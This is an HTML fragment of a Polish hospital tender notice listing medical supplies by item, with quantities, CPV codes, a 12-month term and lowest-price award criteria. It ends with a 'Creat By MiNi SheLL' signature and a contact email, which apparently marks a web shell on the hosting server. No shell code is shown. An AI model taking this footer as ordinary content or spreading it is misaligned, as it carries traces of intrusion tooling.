<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 1
Strzykawka do pomp infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 1
Strzykawka do pomp infuzyjnych bursztynowa lub czarna 3-częściowa	 50 ml	1500 szt.
 z tworzywa sztucznego sterylna z zakończeniem Luer-lock.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz.2 
Prowadnica do igły podpajeczynówkowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20G,śr.0,9, dł.45mm	2500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 3 
Strzykawka heparynizowana heparyną litową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Cewnik do termodylucji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 4 
Cewnik do termodylucji typu Swana-Ganza,4-światłowy,miękki,silikonowanypokryty heparyną,wyposazony w zintegrowany czujnik pomiaru temperatury iniektatu	7 F x 100 cm	12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 5 
Rozszerzadło do cewki moczowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 5 
Rozszerzadło do cewki moczowej (bagietka Neoplex firmy Porges)	Ch 5,Ch 6,Ch 7	3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 6 
Cewnik poliuretanowy do cewnikowania tętnic udowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 6 
Cewnik poliuretanowy do cewnikowania tętnic udowych metodą Seldingera z integralnym zestawem przedłużającym ,skrzydełkami mocującymi i powłoką hydrofilną	18Ga-12 cm,igła 18Ga 5cm	 
	prowadnik 0,025x33 cm	40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 7 
Układ oddechowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 7 
Układ oddechowy z komorą do wentylacji noworodka przy pomocy 	 	10 szt. 
 respiratora Fabian Rt 225.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 8 
Worek do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 8 
Worek do żywienia pozajelitowego z 3 przewodami z klamrami zaciskowymi wykonany z EVA bez ftalanów,obustronna skala co 50 ml z 2-korkami do  zamknięcia drenu typu Luer-lock (w tym jeden korek pakowany osobno) dodatkowo zatrzaskowe zamknięcie drenu,dren z koncówką do aparatu do  przetoczeń typu gumowy korek z kołnierzem, uchwyt do zawieszania worka, sterylny,pakowany folia-papier.	poj. 250 ml lub 500 ml	350 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 9
Probówka do koagulologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 9
Probówka do koagulologii zawierająca buforowany roztwór cytrynianu sodowego o stęż.3,2 %,o podwójnej ściance-zewnętrznej wykonanej z plastiku PET utrzymującego wartość próżni,wewnętrzna ścianka z polipropylenu zapwniającego niezmienne stężenie odczynnika.	 	 
	poj. 1 ml	250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 10 
Przeskórny system wprowadzajacy cewnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 10 
Przeskórny system wprowadzajacy cewnik do tętnicy płucnej,zestaw z portem  bocznym zawierajacy osłonę zabezpieczajacą,adapter z zaworem  hemostatycznym,pakowany pojedyńczo,sterylny.
 Do użytku z cewnikami 7Fr.	 	 
	 	10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 11
Zestaw do PRP:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 11
Zestaw do PRP:	 	 
Igła odpowietrzająca- 2szt.	 	 
Igła motylek 20 G 0,9 19 mm-1szt.	 	 
Igła Sterican 0,8x80-1 szt.	 	 
Strzykawka 1CC-1szt.	 	75
Monoveta 4,9 ml neutralna-1 szt.	 	zestawów
Monoveta 9 ml neutralna-1 szt.	 	 
Monoveta CPDA 01,1610,001-1szt.	 	 
Multiadapter-2 szt.	 	 
Igła Sterican 0,8x120-2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Poz. 12 
Maska tlenowa dla dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 12 
Maska tlenowa dla dzieci z drenem bez ftalanów i lateksu sterylna	 	 
	dł.drenu od 180-200 cm	1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com